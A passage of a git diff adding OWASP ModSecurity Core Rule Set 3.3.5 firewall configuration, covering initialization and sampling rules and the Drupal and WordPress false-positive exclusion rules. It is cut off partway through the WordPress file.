-=[ Initialize internal variables ]=- +# + +# Initialize anomaly scoring variables. +# All _score variables start at 0, and are incremented by the various rules +# upon detection of a possible attack. +# sql_error_match is used for shortcutting rules for performance reasons. + +SecAction \ + "id:901200,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.anomaly_score=0',\ + setvar:'tx.anomaly_score_pl1=0',\ + setvar:'tx.anomaly_score_pl2=0',\ + setvar:'tx.anomaly_score_pl3=0',\ + setvar:'tx.anomaly_score_pl4=0',\ + setvar:'tx.sql_injection_score=0',\ + setvar:'tx.xss_score=0',\ + setvar:'tx.rfi_score=0',\ + setvar:'tx.lfi_score=0',\ + setvar:'tx.rce_score=0',\ + setvar:'tx.php_injection_score=0',\ + setvar:'tx.http_violation_score=0',\ + setvar:'tx.session_fixation_score=0',\ + setvar:'tx.inbound_anomaly_score=0',\ + setvar:'tx.outbound_anomaly_score=0',\ + setvar:'tx.outbound_anomaly_score_pl1=0',\ + setvar:'tx.outbound_anomaly_score_pl2=0',\ + setvar:'tx.outbound_anomaly_score_pl3=0',\ + setvar:'tx.outbound_anomaly_score_pl4=0',\ + setvar:'tx.sql_error_match=0'" + + +# +# -=[ Initialize collections ]=- +# +# Create both Global and IP collections for rules to use. +# There are some CRS rules that assume that these two collections +# have already been initiated. +# + +SecRule REQUEST_HEADERS:User-Agent "@rx ^.*$" \ + "id:901318,\ + phase:1,\ + pass,\ + t:none,t:sha1,t:hexEncode,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.ua_hash=%{MATCHED_VAR}'" + +SecAction \ + "id:901321,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + initcol:global=global,\ + initcol:ip=%{remote_addr}_%{tx.ua_hash},\ + setvar:'tx.real_ip=%{remote_addr}'" + +# +# -=[ Initialize Correct Body Processing ]=- +# +# Force request body variable and optionally request body processor +# + +# Force body variable +SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ + "id:901340,\ + phase:1,\ + pass,\ + nolog,\ + noauditlog,\ + msg:'Enabling body inspection',\ + ctl:forceRequestBodyVariable=On,\ + ver:'OWASP_CRS/3.3.5'" + +# Force body processor URLENCODED +SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ + "id:901350,\ + phase:1,\ + pass,\ + t:none,t:urlDecodeUni,\ + nolog,\ + noauditlog,\ + msg:'Enabling forced body inspection for ASCII content',\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ + "ctl:requestBodyProcessor=URLENCODED" + + +# +# -=[ Easing In / Sampling Percentage ]=- +# +# This is used to send only a limited percentage of requests into the Core +# Rule Set. The selection is based on TX.sampling_percentage and a pseudo +# random number calculated below. +# +# Use this to ease into a new Core Rules installation with an existing +# productive service. +# +# See +# https://www.netnea.com/cms/2016/04/26/easing-in-conditional-modsecurity-rule-execution-based-on-pseudo-random-numbers/ +# + +# +# Generate the pseudo random number +# +# ATTENTION: This is no cryptographically secure random number. It's just +# a cheap way to get some random number suitable for sampling. +# +# We take the entropy contained in the UNIQUE_ID. We hash that variable and +# take the first integer numbers out of it. Theoretically, it is possible +# there are no integers in a sha1 hash. We make sure we get two +# integer numbers by taking the last two digits from the DURATION counter +# (in microseconds). +# Finally, leading zeros are removed from the two-digit random number. +# + +SecRule TX:sampling_percentage "@eq 100" \ + "id:901400,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-SAMPLING" + +SecRule UNIQUE_ID "@rx ^." \ + "id:901410,\ + phase:1,\ + pass,\ + t:sha1,t:hexEncode,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'TX.sampling_rnd100=%{MATCHED_VAR}'" + +SecRule DURATION "@rx (..)$" \ + "id:901420,\ + phase:1,\ + pass,\ + capture,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'TX.sampling_rnd100=%{TX.sampling_rnd100}%{TX.1}'" + +SecRule TX:sampling_rnd100 "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ + "id:901430,\ + phase:1,\ + pass,\ + capture,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'" + +SecRule TX:sampling_rnd100 "@rx ^0([0-9])" \ + "id:901440,\ + phase:1,\ + pass,\ + capture,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'TX.sampling_rnd100=%{TX.1}'" + + +# +# Sampling decision +# +# If a request is allowed to pass without being checked by the CRS, there is no +# entry in the audit log (for performance reasons), but an error log entry is +# being written. If you want to disable the error log entry, then issue the +# following directive somewhere after the inclusion of the CRS +# (E.g., RESPONSE-999-EXCEPTIONS.conf). +# +# SecRuleUpdateActionById 901450 "nolog" +# + + +SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \ + "id:901450,\ + phase:1,\ + pass,\ + log,\ + noauditlog,\ + msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\ + ctl:ruleEngine=Off,\ + ver:'OWASP_CRS/3.3.5'" + +SecMarker "END-SAMPLING" + + +# +# Configuration Plausibility Checks +# + +# Make sure executing paranoia level is not lower than paranoia level +SecRule TX:executing_paranoia_level "@lt %{tx.paranoia_level}" \ + "id:901500,\ + phase:1,\ + deny,\ + status:500,\ + t:none,\ + log,\ + msg:'Executing paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\ + ver:'OWASP_CRS/3.3.5'" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf new file mode 100644 index 000000000..518300aa6 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf @@ -0,0 +1,423 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# These exclusions remedy false positives in a default Drupal install. +# The exclusions are only active if crs_exclusions_drupal=1 is set. +# See rule 900130 in crs-setup.conf.example for instructions. + +# +# [ POLICY ] +# +# Drupal is a complex application that is hard to secure with the CRS. This set +# of exclusion rules aims to sanitise the CRS in a way that allows a default +# Drupal setup to be installed and configured without much hassle as far as +# ModSecurity and the CRS are concerned. +# +# The exclusion rules are fairly straight forward in the sense that they +# disable CRS on a set of well-known parameter fields that are often the source +# of false positives / false alarms of the CRS. This includes namely the +# session cookie, the password fields and article/node bodies. +# +# This is based on two assumptions: - You have a basic trust in your +# authenticated users who are allowed to edit nodes. - Drupal allows html +# content in nodes and it protects your users from attacks via these fields. +# +# If you think these assumptions are wrong or if you would prefer a more +# careful/secure approach, you can disable the exclusion rules handling of said +# node body false positives. Do this by placing the following directive in +# RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf. +# +# SecRuleRemoveById 9001200-9001299 +# +# This will mean the CRS remain intact for the editing of node bodies. +# +# The exclusion rules in this file work without the need to define a Drupal +# installation path prefix. Instead they look at the URI from the end - or +# they use regular expressions when targeting dynamic URL. This is all not +# totally foolproof. In some cases, an advanced attacker might be able to +# doctor a request in a way that one of these exclusion rules is triggered +# and the request will bypass all further inspection despite not being a +# Drupal request at all. These exclusion rules could thus be leveraged to +# disable the CRS completely. This is why these rules are off by default. +# +# The CRS rules covered by this ruleset are the rules with Paranoia Level 1 and +# 2. If you chose to run Paranoia Level 3 or 4, you will be facing additional +# false positives which you need to handle yourself. +# +# This set of exclusion rules does not cover any additional Drupal modules +# outside of core. +# +# The exclusion rules are based on Drupal 8.1.10. +# +# And finally: This set of exclusion rules is in an experimental state. If you +# encounter false positives with the basic Drupal functionality and they are +# not covered by this rule file, then please report them. The aim is to be able +# to install and run Drupal core in a seamless manner protected by +# ModSecurity / CRS up to the paranoia level 2. + + +SecRule &TX:crs_exclusions_drupal|TX:crs_exclusions_drupal "@eq 0" \ + "id:9001000,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-DRUPAL-RULE-EXCLUSIONS" + +SecRule &TX:crs_exclusions_drupal|TX:crs_exclusions_drupal "@eq 0" \ + "id:9001001,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-DRUPAL-RULE-EXCLUSIONS" + + +# [ Table of Contents ] +# +# 9001100 Session Cookie +# 9001110 Password +# 9001120 FREE for use +# 9001130 FREE for use +# 9001140 Content and Descriptions +# 9001150 FREE for use +# 9001160 Form Token +# 9001170 Text Formats and Editors +# 9001180 WYSIWYG/CKEditor Assets and Upload +# 9001190 FREE for use +# 9001200 Content and Descriptions +# +# The rule id range from 9001200 to 9001999 is reserved for future +# use (Drupal plugins / modules). + + +# [ Session Cookie ] +# +# Giving the session cookie a dynamic name is most unfortunate +# from a ModSecurity perspective. The rule language does not allow +# us to disable rules in a granular way for individual cookies with +# dynamic names. So we need to disable rule causing false positives +# for all cookies and their names. +# +# Rule Exclusion Session Cookie: 942450 SQL Hex Encoding Identified +# +SecAction "id:9001100,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES_NAMES,\ + ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES,\ + ver:'OWASP_CRS/3.3.5'" + + +# +# [ Password ] +# +# Disable the CRS completely for all occurrences of passwords. +# +SecRule REQUEST_FILENAME "@endsWith /core/install.php" \ + "id:9001110,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass1],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass2],\ + ver:'OWASP_CRS/3.3.5'" + +SecRule REQUEST_FILENAME "@endsWith /user/login" \ + "id:9001112,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass,\ + ver:'OWASP_CRS/3.3.5'" + +SecRule REQUEST_FILENAME "@endsWith /admin/people/create" \ + "id:9001114,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\ + ver:'OWASP_CRS/3.3.5'" + +SecRule REQUEST_FILENAME "@rx /user/[0-9]+/edit$" \ + "id:9001116,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:current_pass,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\ + ver:'OWASP_CRS/3.3.5'" + + +# +# [ Admin Settings (general) ] +# +# Disable known false positives for various fields used on admin pages. +# +# Rule Exclusion: 920271 Invalid character in request on multiple fields/paths +# Rule Exclusion: 942430 Restricted SQL Character Anomaly Detection (args) +# Disabled completely for admin/config pages +# For the people/accounts page, we disable the CRS completely for a number of +# freeform text fields. +# +SecRule REQUEST_FILENAME "@contains /admin/config/" \ + "id:9001122,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveById=942430,\ + ver:'OWASP_CRS/3.3.5'" + +SecRule REQUEST_FILENAME "@endsWith /admin/config/people/accounts" \ + "id:9001124,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveById=920271,\ + ctl:ruleRemoveById=942440,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_cancel_confirm_body,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_password_reset_body,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_admin_created_body,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_no_approval_required_body,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_pending_approval_body,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_activated_body,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_blocked_body,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_canceled_body,\ + ver:'OWASP_CRS/3.3.5'" + +SecRule REQUEST_FILENAME "@endsWith /admin/config/development/configuration/single/import" \ + "id:9001126,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveById=920271,\ + ctl:ruleRemoveById=942440,\ + ver:'OWASP_CRS/3.3.5'" + +SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ + "id:9001128,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveById=942440,\ + ver:'OWASP_CRS/3.3.5'" + + +# +# +# [ Content and Descriptions ] +# +# Disable known false positives for field "ids[]". +# +# Rule Exclusion: 942130 SQL Injection Attack: SQL Tautology Detected +# +SecRule REQUEST_FILENAME "@endsWith /contextual/render" \ + "id:9001140,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveTargetById=942130;ARGS:ids[],\ + ver:'OWASP_CRS/3.3.5'" + + +# +# [ Form Token / Build ID ] +# +# Rule Exclusion for form_build_id: 942440 SQL Comment Sequence Detected on ... +# Rule Exclusion for form_token: 942450 SQL Hex Encoding +# Rule Exclusion for form_build_id: 942450 SQL Hex Encoding +# +# This is applied site-wide. +# +SecAction "id:9001160,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveTargetById=942440;ARGS:form_build_id,\ + ctl:ruleRemoveTargetById=942450;ARGS:form_token,\ + ctl:ruleRemoveTargetById=942450;ARGS:form_build_id,\ + ver:'OWASP_CRS/3.3.5'" + + +# +# [ Text Formats and Editors ] +# +# Disable the CRS completely for two fields triggering many, many rules +# +# Rule Exclusion for two fields: 942440 SQL Comment Sequence Detected +# +SecRule REQUEST_FILENAME "@endsWith /admin/config/content/formats/manage/full_html" \ + "id:9001170,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:editor[settings][toolbar][button_groups],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:filters[filter_html][settings][allowed_html],\ + ver:'OWASP_CRS/3.3.5'" + + +# +# [ WYSIWYG/CKEditor Assets and Upload ] +# +# Disable the unnecessary requestBodyAccess and for binary uploads +# bigger than an arbitrary limit of 31486341 bytes. +# +# Extensive checks make sure these uploads are really legitimate. +# +# Rule 9001180 was commented out in 2021 in order to fight CVE-2021-35368. +# +#SecRule REQUEST_METHOD "@streq POST" \ +# "id:9001180,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# noauditlog,\ +# ver:'OWASP_CRS/3.3.0',\ +# chain" +# SecRule REQUEST_FILENAME "@rx /admin/content/assets/add/[a-z]+$" \ +# "chain" +# SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \ +# "ctl:requestBodyAccess=Off" + +# Rule 9001182 was commented out in 2021 in order to fight CVE-2021-35368. +# +#SecRule REQUEST_METHOD "@streq POST" \ +# "id:9001182,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# noauditlog,\ +# ver:'OWASP_CRS/3.3.0',\ +# chain" +# SecRule REQUEST_FILENAME "@rx /admin/content/assets/manage/[0-9]+$" \ +# "chain" +# SecRule ARGS:destination "@streq admin/content/assets" \ +# "chain" +# SecRule REQUEST_HEADERS:Content-Length "@gt 31486341" \ +# "chain" +# SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \ +# "ctl:requestBodyAccess=Off" + +# Rule 9001184 was commented out in 2021 in order to fight CVE-2021-35368. +# +#SecRule REQUEST_METHOD "@streq POST" \ +# "id:9001184,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# noauditlog,\ +# ver:'OWASP_CRS/3.3.0',\ +# chain" +# SecRule REQUEST_FILENAME "@rx /file/ajax/field_asset_[a-z0-9_]+/[ua]nd/0/form-[a-z0-9A-Z_-]+$" \ +# "chain" +# SecRule REQUEST_HEADERS:Content-Length "@gt 31486341" \ +# "chain" +# SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)multipart/form-data" \ +# "chain" +# SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \ +# "ctl:requestBodyAccess=Off" + + +# +# [ Content and Descriptions ] +# +# Disable the CRS completely for node bodies and other free text fields. +# Other rules are disabled individually. +# +# Rule Exclusion for ARGS:uid[0][target_id]: 942410 SQL Injection Attack +# Rule Exclusion for ARGS:destination: 932110 RCE: Windows Command Inj. +# +SecRule REQUEST_FILENAME "@endsWith /node/add/article" \ + "id:9001200,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ + ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ + ver:'OWASP_CRS/3.3.5'" + +SecRule REQUEST_FILENAME "@endsWith /node/add/page" \ + "id:9001202,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ + ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ + ver:'OWASP_CRS/3.3.5'" + +SecRule REQUEST_FILENAME "@rx /node/[0-9]+/edit$" \ + "id:9001204,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ + ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ + ctl:ruleRemoveTargetById=932110;ARGS:destination,\ + ver:'OWASP_CRS/3.3.5'" + +SecRule REQUEST_FILENAME "@endsWith /block/add" \ + "id:9001206,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ + ver:'OWASP_CRS/3.3.5'" + +SecRule REQUEST_FILENAME "@endsWith /admin/structure/block/block-content/manage/basic" \ + "id:9001208,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:description,\ + ver:'OWASP_CRS/3.3.5'" + +SecRule REQUEST_FILENAME "@rx /editor/filter_xss/(?:full|basic)_html$" \ + "id:9001210,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:value,\ + ver:'OWASP_CRS/3.3.5'" + +SecRule REQUEST_FILENAME "@rx /user/[0-9]+/contact$" \ + "id:9001212,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message[0][value],\ + ver:'OWASP_CRS/3.3.5'" + +SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ + "id:9001214,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:maintenance_mode_message,\ + ver:'OWASP_CRS/3.3.5'" + +SecRule REQUEST_FILENAME "@endsWith /admin/config/services/rss-publishing" \ + "id:9001216,\ + phase:2,\ + pass,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:feed_description,\ + ver:'OWASP_CRS/3.3.5'" + + +SecMarker "END-DRUPAL-RULE-EXCLUSIONS" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf new file mode 100644 index 000000000..b4e75fa22 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf @@ -0,0 +1,760 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# These exclusions remedy false positives in a default WordPress install. +# The exclusions are only active if crs_exclusions_wordpress=1 is set. +# See rule 900130 in crs-setup.conf.example for instructions. +# +# Note that the WordPress comment field itself is currently NOT excluded +# from checking. The reason is that malicious content is regularly being +# posted to WordPress comment forms, and there have been various cases +# of XSS and even RCE vulnerabilities exploited by WordPress comments. + +SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \ + "id:9002000,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-WORDPRESS" + +SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \ + "id:9002001,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-WORDPRESS" + + +# +# -=[ WordPress Front-End ]=- +# + + +# +# [ Login form ] +# + +# User login password +SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ + "id:9002100,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd,\ + ver:'OWASP_CRS/3.3.5'" + +# Reset password +SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ + "id:9002120,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:action "@streq resetpass" \ + "t:none,\ + chain" + SecRule &ARGS:action "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" + + +# +# [ Comments ] +# + +# Post comment +SecRule REQUEST_FILENAME "@endsWith /wp-comments-post.php" \ + "id:9002130,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=931130;ARGS:url,\ + ver:'OWASP_CRS/3.3.5'" + + +# +# [ Gutenberg Editor ] +# Used when a user (auto)saves a post/page with Gutenberg. +# + +# Gutenberg +SecRule REQUEST_FILENAME "@rx /wp-json/wp/v[0-9]+/(?:posts|pages)" \ + "id:9002140,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:json.content,\ + ver:'OWASP_CRS/3.3.5'" + +# Gutenberg via rest_route for sites without pretty permalinks +SecRule REQUEST_FILENAME "@endsWith /index.php" \ + "id:9002141,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule &ARGS:rest_route "@eq 1" \ + "t:none,\ + nolog,\ + chain" + SecRule ARGS:rest_route "@rx ^/wp/v[0-9]+/(?:posts|pages)" \ + "t:none,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:json.content" + +# Gutenberg upload image/media +SecRule REQUEST_FILENAME "@rx /wp-json/wp/v[0-9]+/media" \ + "id:9002142,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveById=200002,\ + ctl:ruleRemoveById=200003,\ + ver:'OWASP_CRS/3.3.5'" + +# Gutenberg upload image/media via rest_route for sites without pretty permalinks +SecRule REQUEST_FILENAME "@endsWith /index.php" \ + "id:9002143,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule &ARGS:rest_route "@eq 1" \ + "t:none,\ + nolog,\ + chain" + SecRule ARGS:rest_route "@rx ^/wp/v[0-9]+/media" \ + "t:none,\ + ctl:ruleRemoveById=200002,\ + ctl:ruleRemoveById=200003" + +# +# [ Live preview ] +# Used when an administrator customizes the site and previews the result +# as a normal user. +# + +# Theme select +# Example: wp_customize=on&theme=twentyfifteen&customized= +# {"old_sidebars_widgets_data":{"wp_inactive_widgets":[], +# "sidebar-1":["search-2","recent-posts-2","recent-comments-2", +# "archives-2","categories-2","meta-2"]}}&nonce=XXX& +# customize_messenger_channel=preview-0 +SecRule ARGS:wp_customize "@streq on" \ + "id:9002150,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule &ARGS:action "@eq 0" \ + "t:none,\ + ctl:ruleRemoveTargetById=942200;ARGS:customized,\ + ctl:ruleRemoveTargetById=942260;ARGS:customized,\ + ctl:ruleRemoveTargetById=942300;ARGS:customized,\ + ctl:ruleRemoveTargetById=942330;ARGS:customized,\ + ctl:ruleRemoveTargetById=942340;ARGS:customized,\ + ctl:ruleRemoveTargetById=942370;ARGS:customized,\ + ctl:ruleRemoveTargetById=942430;ARGS:customized,\ + ctl:ruleRemoveTargetById=942431;ARGS:customized,\ + ctl:ruleRemoveTargetById=942460;ARGS:customized" + +# Appearance -> Widgets -> Live Preview +SecRule ARGS:wp_customize "@streq on" \ + "id:9002160,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:action "@rx ^(?:|customize_save|update-widget)$" \ + "t:none,\ + chain" + SecRule &ARGS:action "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetById=942200;ARGS:customized,\ + ctl:ruleRemoveTargetById=942260;ARGS:customized,\ + ctl:ruleRemoveTargetById=942300;ARGS:customized,\ + ctl:ruleRemoveTargetById=942330;ARGS:customized,\ + ctl:ruleRemoveTargetById=942340;ARGS:customized,\ + ctl:ruleRemoveTargetById=942370;ARGS:customized,\ + ctl:ruleRemoveTargetById=942430;ARGS:customized,\ + ctl:ruleRemoveTargetById=942431;ARGS:customized,\ + ctl:ruleRemoveTargetById=942460;ARGS:customized,\ + ctl:ruleRemoveTargetById=920230;ARGS:partials,\ + ctl:ruleRemoveTargetById=941320;ARGS:partials,\ + ctl:ruleRemoveTargetById=942180;ARGS:partials,\ + ctl:ruleRemoveTargetById=942200;ARGS:partials,\ + ctl:ruleRemoveTargetById=942260;ARGS:partials,\ + ctl:ruleRemoveTargetById=942330;ARGS:partials,\ + ctl:ruleRemoveTargetById=942340;ARGS:partials,\ + ctl:ruleRemoveTargetById=942370;ARGS:partials,\ + ctl:ruleRemoveTargetById=942430;ARGS:partials,\ + ctl:ruleRemoveTargetById=942431;ARGS:partials,\ + ctl:ruleRemoveTargetById=942460;ARGS:partials" + + + +# Self calls to wp-cron.php?doing_wp_cron=[timestamp] +# These requests may be missing Accept, Content-Length headers. +# This rule must run in phase:1. +SecRule REQUEST_FILENAME "@endsWith /wp-cron.php" \ + "id:9002200,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveById=920180,\ + ctl:ruleRemoveById=920300,\ + ver:'OWASP_CRS/3.3.5'" + + +# +# [ Cookies ] + +# WP Session Manager +# Cookie: _wp_session=[hex]||[timestamp]||[timestamp] +# detected SQLi using libinjection with fingerprint 'n&1' +SecRule REQUEST_COOKIES:_wp_session "@rx ^[0-9a-f]+\|\|\d+\|\|\d+$" \ + "id:9002300,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule &REQUEST_COOKIES:_wp_session "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:_wp_session" + + +# +# -=[ WordPress Administration Back-End (wp-admin) ]=- +# + +# Skip this section for performance unless /wp-admin/ is in filename + +SecRule REQUEST_FILENAME "!@contains /wp-admin/" \ + "id:9002400,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-WORDPRESS-ADMIN" + +SecRule REQUEST_FILENAME "!@contains /wp-admin/" \ + "id:9002401,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-WORDPRESS-ADMIN" + + +# +# [ Installation ] +# + +# WordPress installation: exclude database password +SecRule REQUEST_FILENAME "@endsWith /wp-admin/setup-config.php" \ + "id:9002410,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:step "@streq 2" \ + "t:none,\ + chain" + SecRule &ARGS:step "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd" + +# WordPress installation: exclude admin password +SecRule REQUEST_FILENAME "@endsWith /wp-admin/install.php" \ + "id:9002420,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:step "@streq 2" \ + "t:none,\ + chain" + SecRule &ARGS:step "@eq 1" \ + "t:none,\ + 